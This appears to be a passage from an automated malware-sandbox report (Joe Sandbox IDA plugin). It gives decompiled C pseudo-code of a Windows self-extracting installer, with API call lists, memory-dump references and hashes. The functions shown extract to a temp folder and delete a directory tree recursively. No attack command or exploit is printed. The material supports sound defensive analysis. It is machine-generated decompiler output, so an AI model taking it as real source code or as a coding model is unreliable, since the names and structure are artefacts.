                                                                                                                                                                                                        						return E001F6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E001F55A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E001F658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0x1fa288("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0x1f8a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0x1f8a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0x1f8d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0x1f8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0x1f9a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E001F256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0x1f8a24; // 0x0
                                                                                                                                                                                                        									 *0x1f9a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0x1f8a38;
                                                                                                                                                                                                        										if( *0x1f8a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E001F4169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0x1f9a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E001F3BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0x1f8a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E001F3B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E001F44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0x1f9a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E001F621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0x1f8a24;
                                                                                                                                                                                                        				if( *0x1f8a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E001F3A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E001F51E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0x1f8a38;
                                                                                                                                                                                                        				if( *0x1f8a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x001f2f1d
                                                                                                                                                                                                        0x001f2f28
                                                                                                                                                                                                        0x001f2f2f
                                                                                                                                                                                                        0x001f2f3d
                                                                                                                                                                                                        0x001f2f6c
                                                                                                                                                                                                        0x001f2f6c
                                                                                                                                                                                                        0x001f2f71
                                                                                                                                                                                                        0x001f2f73
                                                                                                                                                                                                        0x001f3041
                                                                                                                                                                                                        0x001f3041
                                                                                                                                                                                                        0x001f3043
                                                                                                                                                                                                        0x001f3053
                                                                                                                                                                                                        0x001f3053
                                                                                                                                                                                                        0x001f2f79
                                                                                                                                                                                                        0x001f2f80
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2f86
                                                                                                                                                                                                        0x001f2f86
                                                                                                                                                                                                        0x001f2f93
                                                                                                                                                                                                        0x001f2f9e
                                                                                                                                                                                                        0x001f2fa0
                                                                                                                                                                                                        0x001f2fa6
                                                                                                                                                                                                        0x001f2fb8
                                                                                                                                                                                                        0x001f2fba
                                                                                                                                                                                                        0x001f2fbe
                                                                                                                                                                                                        0x001f2fc6
                                                                                                                                                                                                        0x001f2fcc
                                                                                                                                                                                                        0x001f2fd4
                                                                                                                                                                                                        0x001f2fd6
                                                                                                                                                                                                        0x001f2fd8
                                                                                                                                                                                                        0x001f2fe0
                                                                                                                                                                                                        0x001f2fe6
                                                                                                                                                                                                        0x001f2fee
                                                                                                                                                                                                        0x001f2ff0
                                                                                                                                                                                                        0x001f2ff5
                                                                                                                                                                                                        0x001f2ff5
                                                                                                                                                                                                        0x001f2fee
                                                                                                                                                                                                        0x001f2fd4
                                                                                                                                                                                                        0x001f2ff8
                                                                                                                                                                                                        0x001f2ffe
                                                                                                                                                                                                        0x001f3004
                                                                                                                                                                                                        0x001f3017
                                                                                                                                                                                                        0x001f301c
                                                                                                                                                                                                        0x001f3024
                                                                                                                                                                                                        0x001f3054
                                                                                                                                                                                                        0x001f305a
                                                                                                                                                                                                        0x001f3065
                                                                                                                                                                                                        0x001f3065
                                                                                                                                                                                                        0x001f306c
                                                                                                                                                                                                        0x001f306e
                                                                                                                                                                                                        0x001f3075
                                                                                                                                                                                                        0x001f307a
                                                                                                                                                                                                        0x001f307a
                                                                                                                                                                                                        0x001f307c
                                                                                                                                                                                                        0x001f3081
                                                                                                                                                                                                        0x001f3087
                                                                                                                                                                                                        0x001f3089
                                                                                                                                                                                                        0x001f30a1
                                                                                                                                                                                                        0x001f30a1
                                                                                                                                                                                                        0x001f30a9
                                                                                                                                                                                                        0x001f30ab
                                                                                                                                                                                                        0x001f30ad
                                                                                                                                                                                                        0x001f30af
                                                                                                                                                                                                        0x001f30af
                                                                                                                                                                                                        0x001f30ad
                                                                                                                                                                                                        0x001f30b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f308b
                                                                                                                                                                                                        0x001f308b
                                                                                                                                                                                                        0x001f3091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3093
                                                                                                                                                                                                        0x001f3098
                                                                                                                                                                                                        0x001f309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f309c
                                                                                                                                                                                                        0x001f3089
                                                                                                                                                                                                        0x001f305c
                                                                                                                                                                                                        0x001f3061
                                                                                                                                                                                                        0x001f3063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3063
                                                                                                                                                                                                        0x001f302b
                                                                                                                                                                                                        0x001f3032
                                                                                                                                                                                                        0x001f303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f303c
                                                                                                                                                                                                        0x001f3006
                                                                                                                                                                                                        0x001f300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f300e
                                                                                                                                                                                                        0x001f3015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3015
                                                                                                                                                                                                        0x001f2f80
                                                                                                                                                                                                        0x001f2f3f
                                                                                                                                                                                                        0x001f2f46
                                                                                                                                                                                                        0x001f2f5f
                                                                                                                                                                                                        0x001f2f5f
                                                                                                                                                                                                        0x001f2f64
                                                                                                                                                                                                        0x001f2f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2f66
                                                                                                                                                                                                        0x001f2f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2f55
                                                                                                                                                                                                        0x001f2f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F2F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 001F2FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 001F2FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 001F2FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 001F2FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F301C
                                                                                                                                                                                                          • Part of subcall function 001F51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001F2F4D,?,00000002,00000000), ref: 001F5201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-2099937843
                                                                                                                                                                                                        • Opcode ID: 8472cd1385e298c86fe59ad6dcbacd7fb8d7b7ab40189a4ac8d644eec6c69c62
                                                                                                                                                                                                        • Instruction ID: 4673398c301a23a9e7a7466019063323861d5d283c0ecf049a4a65062e532d2e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8472cd1385e298c86fe59ad6dcbacd7fb8d7b7ab40189a4ac8d644eec6c69c62
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F541BD71A0020D9ADB30BB75EC49B7A37A8EBA4750F000166FB55C39A1EF74CEC1CA61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E001F2390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E001F6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E001F1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E001F16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E001F1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E001F16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E001F16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E001F658A( &_v280, 0x104, 0x1f1140);
                                                                                                                                                                                                        								E001F2390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





















                                                                                                                                                                                                        0x001f2398
                                                                                                                                                                                                        0x001f239e
                                                                                                                                                                                                        0x001f23a3
                                                                                                                                                                                                        0x001f23a5
                                                                                                                                                                                                        0x001f23ae
                                                                                                                                                                                                        0x001f23b3
                                                                                                                                                                                                        0x001f24cb
                                                                                                                                                                                                        0x001f24d2
                                                                                                                                                                                                        0x001f24d3
                                                                                                                                                                                                        0x001f24d4
                                                                                                                                                                                                        0x001f24df
                                                                                                                                                                                                        0x001f23c2
                                                                                                                                                                                                        0x001f23d1
                                                                                                                                                                                                        0x001f23db
                                                                                                                                                                                                        0x001f23e4
                                                                                                                                                                                                        0x001f23f6
                                                                                                                                                                                                        0x001f23fc
                                                                                                                                                                                                        0x001f2401
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2407
                                                                                                                                                                                                        0x001f2407
                                                                                                                                                                                                        0x001f2408
                                                                                                                                                                                                        0x001f2411
                                                                                                                                                                                                        0x001f241f
                                                                                                                                                                                                        0x001f247a
                                                                                                                                                                                                        0x001f2483
                                                                                                                                                                                                        0x001f2495
                                                                                                                                                                                                        0x001f24a3
                                                                                                                                                                                                        0x001f2421
                                                                                                                                                                                                        0x001f242f
                                                                                                                                                                                                        0x001f2453
                                                                                                                                                                                                        0x001f245d
                                                                                                                                                                                                        0x001f2466
                                                                                                                                                                                                        0x001f2472
                                                                                                                                                                                                        0x001f2472
                                                                                                                                                                                                        0x001f242f
                                                                                                                                                                                                        0x001f24af
                                                                                                                                                                                                        0x001f24b5
                                                                                                                                                                                                        0x001f24be
                                                                                                                                                                                                        0x001f24c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f24c5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,001F8A3A,001F11F4,001F8A3A,00000000,?,?), ref: 001F23F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,001F11F8), ref: 001F2427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,001F11FC), ref: 001F243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 001F2495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 001F24A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001F24AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 001F24BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(001F8A3A), ref: 001F24C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 19be457df7a534f0cfd8b3088465d5a2471235e15e6a7b6e5e603143078f156c
                                                                                                                                                                                                        • Instruction ID: b1c8f75823a00b23b093683d4ae8ab40bcbdb7fa7a728cd232f6b82b9d359068
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19be457df7a534f0cfd8b3088465d5a2471235e15e6a7b6e5e603143078f156c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4319271204648EBC320DB64DC89AFB73ECAFD4315F44492DF659C2290EF789949C752
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E001F2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0x1fa288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0x1f9124 = 0;
                                                                                                                                                                                                        				if(E001F2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E001F2F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E001F52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0x1f8a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0x1f9a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E001F1F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0x1f8588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0x1f9124; // 0x80070002
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x001f2c03
                                                                                                                                                                                                        0x001f2c0d
                                                                                                                                                                                                        0x001f2c18
                                                                                                                                                                                                        0x001f2c20
                                                                                                                                                                                                        0x001f2c2e
                                                                                                                                                                                                        0x001f2c32
                                                                                                                                                                                                        0x001f2c36
                                                                                                                                                                                                        0x001f2c3d
                                                                                                                                                                                                        0x001f2c43
                                                                                                                                                                                                        0x001f2c45
                                                                                                                                                                                                        0x001f2c47
                                                                                                                                                                                                        0x001f2c49
                                                                                                                                                                                                        0x001f2c4e
                                                                                                                                                                                                        0x001f2c4e
                                                                                                                                                                                                        0x001f2c47
                                                                                                                                                                                                        0x001f2c32
                                                                                                                                                                                                        0x001f2c20
                                                                                                                                                                                                        0x001f2c50
                                                                                                                                                                                                        0x001f2c54
                                                                                                                                                                                                        0x001f2c57
                                                                                                                                                                                                        0x001f2c64
                                                                                                                                                                                                        0x001f2c66
                                                                                                                                                                                                        0x001f2c6b
                                                                                                                                                                                                        0x001f2c6d
                                                                                                                                                                                                        0x001f2c74
                                                                                                                                                                                                        0x001f2c76
                                                                                                                                                                                                        0x001f2c7c
                                                                                                                                                                                                        0x001f2c7e
                                                                                                                                                                                                        0x001f2c87
                                                                                                                                                                                                        0x001f2c89
                                                                                                                                                                                                        0x001f2c89
                                                                                                                                                                                                        0x001f2c87
                                                                                                                                                                                                        0x001f2c7c
                                                                                                                                                                                                        0x001f2c74
                                                                                                                                                                                                        0x001f2c8e
                                                                                                                                                                                                        0x001f2c95
                                                                                                                                                                                                        0x001f2c98
                                                                                                                                                                                                        0x001f2c98
                                                                                                                                                                                                        0x001f2c9e
                                                                                                                                                                                                        0x001f2ca7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,001F6BB0,001F0000,00000000,00000002,0000000A), ref: 001F2C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,001F6BB0,001F0000,00000000,00000002,0000000A), ref: 001F2C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 001F2C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,001F6BB0,001F0000,00000000,00000002,0000000A), ref: 001F2C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 7d35b500493981ed54be68b7525b272e918442f2d7b1789c2cdc97a11fbcce97
                                                                                                                                                                                                        • Instruction ID: f0f3a3079792cff7cae33ffe1203112f047fdf520ef3b6812aa32521eb2158a1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d35b500493981ed54be68b7525b272e918442f2d7b1789c2cdc97a11fbcce97
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74118EB120030DABD720BBB5AC8AABE3769AB887A0B050025FB05D7651DB75DC82C661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F6F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E001F6EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x001f6f45
                                                                                                                                                                                                        0x001f6f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 001F6F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
